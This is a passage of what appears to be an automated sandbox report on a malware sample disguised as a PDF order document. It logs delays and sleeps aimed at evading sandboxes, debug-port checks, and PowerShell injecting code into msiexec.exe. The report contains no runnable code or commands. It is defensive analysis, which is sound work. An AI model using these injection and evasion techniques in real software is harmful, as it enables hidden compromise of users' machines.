            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598786Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596717Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596327Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596030Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595688Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593735Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6706Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3085Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8184Thread sleep count: 1764 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8184Thread sleep count: 8064 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -599422s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -598786s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -598563s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -598235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -598110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -597860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -596717s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -596327s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -596156s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -596030s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -595922s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -595813s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -595688s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -595578s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -595469s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -595344s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -594985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -593985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -593860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8180Thread sleep time: -593735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_00406448 FindFirstFileA,FindClose,0_2_00406448
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040589C
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598786Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596717Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596327Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596030Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595688Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593735Jump to behavior
            Source: msiexec.exe, 00000006.00000002.2943801242.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
            Source: msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd0b53820095de<
            Source: msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2943801242.0000000000C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3391
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4220000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
